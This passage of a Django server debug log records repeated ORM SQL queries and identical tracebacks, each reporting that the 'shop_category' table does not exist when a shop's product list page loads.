= wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 13:54:26] "GET / HTTP/1.0" 500 196472 DEBUG 2019-11-28 13:57:32,515 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 13:57:32,542 utils 18022 140356174259968 (0.000) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 13:57:32,543 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,544 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,545 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,546 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,547 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,548 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,549 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,550 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,551 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,552 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,553 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,554 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,555 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,556 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,557 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,558 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,559 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,560 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,561 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:32,562 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 13:57:32] "GET / HTTP/1.0" 500 197584 DEBUG 2019-11-28 13:57:36,081 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 13:57:36,134 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 13:57:36,136 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,137 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,139 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,141 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,142 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,144 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,146 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,147 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,149 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,151 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,153 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,155 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,157 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,158 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,160 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,162 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,163 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,165 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,166 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:57:36,168 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 13:57:36] "GET / HTTP/1.0" 500 197588 DEBUG 2019-11-28 13:59:37,292 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 13:59:37,329 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 13:59:37,330 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,331 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,333 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,334 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,335 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,336 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,337 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,337 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,339 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,339 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,341 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,342 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,343 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,344 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,345 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,346 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,347 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,348 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,349 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:59:37,350 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File 